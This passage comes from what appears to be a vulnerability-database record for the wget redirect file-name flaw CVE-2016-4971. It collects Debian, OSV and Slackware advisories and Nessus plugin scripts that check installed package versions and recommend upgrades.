"https://0day.today/exploit/36167", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "osv": [{"lastseen": "2022-07-21T08:13:25", "description": "\nOn a server redirect from HTTP to a FTP resource, wget would trust\nthe HTTP server and uses the name in the redirected URL as the\ndestination filename.\nThis behaviour was changed and now it works similarly as a redirect\nfrom HTTP to another HTTP resource so the original name is used as\nthe destination file. 
To keep the previous behaviour the user must\nprovide --trust-server-names.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.13.4-3+deb7u3.\n\n\nWe recommend that you upgrade your wget packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-30T00:00:00", "type": "osv", "title": "wget - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2022-07-21T05:54:31", "id": "OSV:DLA-536-1", "href": "https://osv.dev/vulnerability/DLA-536-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T00:00:50", "description": "It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. 
This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.", "cvss3": {}, "published": "2016-06-30T17:59:00", "type": "osv", "title": "CVE-2016-4971", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2023-02-03T00:00:48", "id": "OSV:CVE-2016-4971", "href": "https://osv.dev/vulnerability/CVE-2016-4971", "cvss": {"score": 0.0, "vector": "NONE"}}], "slackware": [{"lastseen": "2021-07-28T14:46:55", "description": "New wget packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/wget-1.18-i486-1_slack14.1.txz: Upgraded.\n This version fixes a security vulnerability present in all old versions\n of wget. On a server redirect from HTTP to a FTP resource, wget would\n trust the HTTP server and use the name in the redirected URL as the\n destination filename. This behaviour was changed and now it works\n similarly as a redirect from HTTP to another HTTP resource so the original\n name is used as the destination file. To keep the previous behaviour the\n user must provide --trust-server-names.\n The vulnerability was discovered by Dawid Golunski and was reported by\n Beyond Security's SecuriTeam.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/wget-1.18-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/wget-1.18-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/wget-1.18-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/wget-1.18-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/wget-1.18-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/wget-1.18-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/wget-1.18-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/wget-1.18-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/wget-1.18-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/wget-1.18-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/wget-1.18-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/wget-1.18-x86_64-1.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg wget-1.18-i486-1_slack14.1.txz", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-13T07:12:06", "type": "slackware", "title": "[slackware-security] wget", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, 
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-13T07:12:06", "id": "SSA-2016-165-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.532542", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2022-04-12T16:12:09", "description": "Security Fix(es) :\n\n - It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-12-15T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : wget on SL7.x x86_64 (20161103)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:wget", "p-cpe:/a:fermilab:scientific_linux:wget-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20161103_WGET_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/95865", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95865);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_name(english:\"Scientific Linux Security Update : wget on SL7.x x86_64 (20161103)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - It was found that wget used a file name provided by the\n server for the downloaded file when following an HTTP\n redirect to a FTP server resource. This could cause wget\n to create a file with a different name than expected,\n possibly allowing the server to execute arbitrary code\n on the client. (CVE-2016-4971)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1612&L=scientific-linux-errata&F=&S=&P=7504\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ff28d729\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wget and / or wget-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"wget-1.14-13.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-13.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-02T17:03:13", "description": "An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. 
(CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-11-04T00:00:00", "type": "nessus", "title": "RHEL 7 : wget (RHSA-2016:2587)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:wget", "p-cpe:/a:redhat:enterprise_linux:wget-debuginfo", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2016-2587.NASL", "href": "https://www.tenable.com/plugins/nessus/94550", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2587. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94550);\n script_version(\"2.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"RHSA\", value:\"2016:2587\");\n\n script_name(english:\"RHEL 7 : wget (RHSA-2016:2587)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for\nHTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for\nthe downloaded file when following an HTTP redirect to a FTP server\nresource. This could cause wget to create a file with a different name\nthan expected, possibly allowing the server to execute arbitrary code\non the client. 
(CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-4971\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wget and / or wget-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2587\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"wget-1.14-13.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"wget-1.14-13.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"wget-debuginfo-1.14-13.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-13.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo\");\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-02T16:56:31", "description": "The remote host is affected by the vulnerability described in GLSA-201610-11 (GNU Wget: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Wget. 
Please review the CVE identifier and bug reports referenced for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process or obtain sensitive information.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-10-31T00:00:00", "type": "nessus", "title": "GLSA-201610-11 : GNU Wget: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:wget", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201610-11.NASL", "href": "https://www.tenable.com/plugins/nessus/94422", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201610-11.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94422);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"GLSA\", value:\"201610-11\");\n\n script_name(english:\"GLSA-201610-11 : GNU Wget: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201610-11\n(GNU Wget: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Wget. Please review the\n CVE identifier and bug reports referenced for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201610-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All GNU Wget users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/wget-1.18'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/wget\", unaffected:make_list(\"ge 1.18\"), vulnerable:make_list(\"lt 1.18\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GNU Wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-17T14:23:25", "description": "This update for wget fixes the following issue :\n\n - CVE-2016-4971: HTTP to a FTP redirection file name confusion vulnerability (boo#984060).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-08-12T00:00:00", "type": "nessus", "title": "openSUSE Security Update : wget (openSUSE-2016-973)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:wget", "p-cpe:/a:novell:opensuse:wget-debuginfo", "p-cpe:/a:novell:opensuse:wget-debugsource", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-973.NASL", "href": "https://www.tenable.com/plugins/nessus/92931", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-973.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92931);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_name(english:\"openSUSE Security Update : wget (openSUSE-2016-973)\");\n script_summary(english:\"Check for the openSUSE-2016-973 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a 
security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issue :\n\n - CVE-2016-4971: HTTP to a FTP redirection file name\n confusion vulnerability (boo#984060).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 